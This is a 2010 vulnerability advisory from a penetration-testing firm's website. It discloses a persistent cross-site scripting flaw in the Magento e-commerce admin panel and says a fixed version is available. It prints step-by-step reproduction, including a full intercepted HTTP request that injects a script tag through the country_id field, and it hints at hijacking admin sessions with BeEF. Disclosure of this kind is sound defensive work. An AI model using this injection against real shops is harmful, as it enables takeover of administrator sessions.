Your browser has been detected as Internet Explorer 6. Please note not all website functionality will be available. Therefore we strongry reccoment upgrading your browser.

About Us

Testing Services

7Safe Services

Follow us

  • Follow us on Twitter
CREST Approved Pen Testing services

RSS News & Events

    Subscribe To Our Newsletter

    Your Name (required)

    Your Email (required)

23rd November, 2010

Magento E-commerce Persistent Cross Site Scripting Issue

7safe’s pentest team found a Persistent Cross Site Scripting Issue in Magento-ecommerce application. Magento has released a new version which addresses this issue. This issue was reported in version 1.4.0.1. It is quite likely that earlier versions are vulnerable too. 7safe has rated this issue as high/critical and would advise all Magento Customers to upgrade to the new version.

Risk Rating: High/Critical

Technical Details:

The Admin section is vulnerable to Persistent Cross Site Scripting and any registered user (standard/non admin) can carry out this attack against an admin user and hijack their session. These steps can be taken to re-create this issue:

1. Login or create a new account by following the registration functionality.

2. Add/edit the primary address section.

3. Use a Man-in-the-middle tool like burp proxy to manipulate the above mentioned post request. Modify the country_id parameter to include javascript. The request would look like this:

POST /customer/address/formPost/id/xxxx/?chpage=1 HTTP/1.1

Host: www.xxxxxxxxxx

User-Agent: Mozilla/5.0 xxxxxxxxxxxxxx

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 115

Connection: keep-alive

Referer: https://www.xxxxxxxxxxx/customer/address/edit/id/53625

Cookie: frontend=xxxxxxxxxxx;

currency=EUR; PHPSESSID=xxxxxxxxxxxxxxxxxxxxxx; __utmb=123697033.7.10.1285169224

Content-Type: application/x-www-form-urlencoded

Content-Length: 551

form_key=31LBvAjNzFb0HJSa&fax=Billing+Address&success_url=&error_url=&firstname=aaaa7safe&lastname=aaaa&telephone=11111+script+&company=7safe&street%5B%5D=7safe&city=7safe&region=7safe&postcode=7safe&country_id=<script>alert(1);</script>

4. Following this, when an admin user logs into the admin panel the script will automatically be executed when he navigates to the ‘customers’ tab. If there are many users/customers in the system and the ‘Customers’ tab only shows the last few customers then the admin user may have to navigate to the right page which shows the brief summary of the malicious user to see the script executing. Usually a newly created user gets displayed automatically in this tab and thus carrying out this attack with a newly registered user will only require the admin user to click on the ‘Customers’ tab.
5. Enjoy the admin session. Beef is your friend.

  • Share/Bookmark
ISO 27001 & 9001
7Safe London
27 Austin Friars
London
EC2N 2QP

Tel: +44 (0)870 600 1667
Fax: +44 (0)870 600 1668
7Safe Cambridge
South Cambridge Business Park
Sawston, Cambridge CB22 3JH
United Kingdom

Tel: +44 (0)870 600 1667
Fax: +44 (0)870 600 1668